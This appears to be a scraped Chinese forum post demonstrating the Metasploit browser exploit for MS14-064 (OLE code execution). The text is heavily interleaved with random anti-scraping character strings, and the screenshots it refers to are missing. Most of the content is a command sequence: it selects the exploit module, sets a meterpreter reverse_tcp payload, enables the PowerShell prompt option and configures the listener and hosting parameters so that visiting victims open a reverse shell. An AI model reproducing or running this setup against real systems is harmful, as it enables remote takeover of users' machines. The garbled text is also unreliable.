% b4 @ B' }# F5 d* H
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示$ f; Q2 |( A; Z5 ?
5 H; r( R6 u4 n. w' A/ M' r, ~
4 ~$ n3 `7 r! H o9 {* ^5 w
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 4 u( O6 k1 @" j m8 R# j
, w8 g( `- s" a7 ^5 p) ^# [! k8 g. \5 @1 e% j; ^& E- ]
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp: o: A* l! T/ P% H! h/ I( t
0 \8 [" k, t$ f: L
# R% o3 k8 i$ |+ ?3 @! p set AllowPowershellPrompt true
5 C: _. E+ H& G6 X# j- q' _8 j; n& @
/ g2 g0 j( y6 c/ X$ w
2 @% n# v" W; u" g Set LHOST 192.168.0.109
# R8 [0 J% _& t- o0 X% v0 p
9 D0 |! I8 y* H8 v( i8 e0 m" i+ x0 C
set SRVHOST 192.168.0.109$ ]' @6 q: G! k2 B7 Q1 H' N9 W
K7 E) C0 K4 D* a) w& b+ ^# }4 P; d
Set uripath share
$ I+ B8 Q) v! F5 r
1 ]. q8 r" r v; l. ]! P& M1 f0 ?
9 D& ~, o% ~2 m$ H; B1 M* y
Set srvport 80
( _( k& A9 s' T* y5 N0 U
S2 G# ]$ v- R, J
& W! R0 `# k; c. M0 ]7 \ X) ? 0 \ o% |2 _! Z: G+ }
/ [/ o( \# o) q4 y
% k8 F5 ]/ u8 S9 {
1 I2 J5 @7 a% |* u+ l: F; m: E0 T
* K& p9 ?& E( ^: ~: [
, j" e: X0 R( c& u
# Z. t+ J3 z9 g) b: D3 |* p- U
1 x( ]% f3 V5 l# m3 N
+ S. C, K: [" y% p0 v1 V % v6 R' L# }" b, J* B% e/ j: j
) O/ S- o; s: p" {
+ J& n5 _0 f& r$ O$ B s+ Y
* X+ _/ g" }! H4 V: @4 n( x, N8 i$ H
+ h% b) Y6 C" G4 i1 j- D4 \
: b' z6 @0 ?9 a2 U+ f3 M7 }. Q 下面我们来访问本地地址如图:
6 a( e/ a* F4 y5 C9 O/ d: z
. x' b5 f* v+ S" M
7 \; i& A& h: [. i 7 I' v% I( d+ A. q
& w0 u1 G* {$ e8 i
) A$ ^9 N. k. g0 F6 g
3 B( _7 r* a d+ F
$ N; Q4 h- _/ x7 H, X
: }6 h* G5 V8 l+ x% C
2 r1 J' E: l' w4 |; |% i" ~& k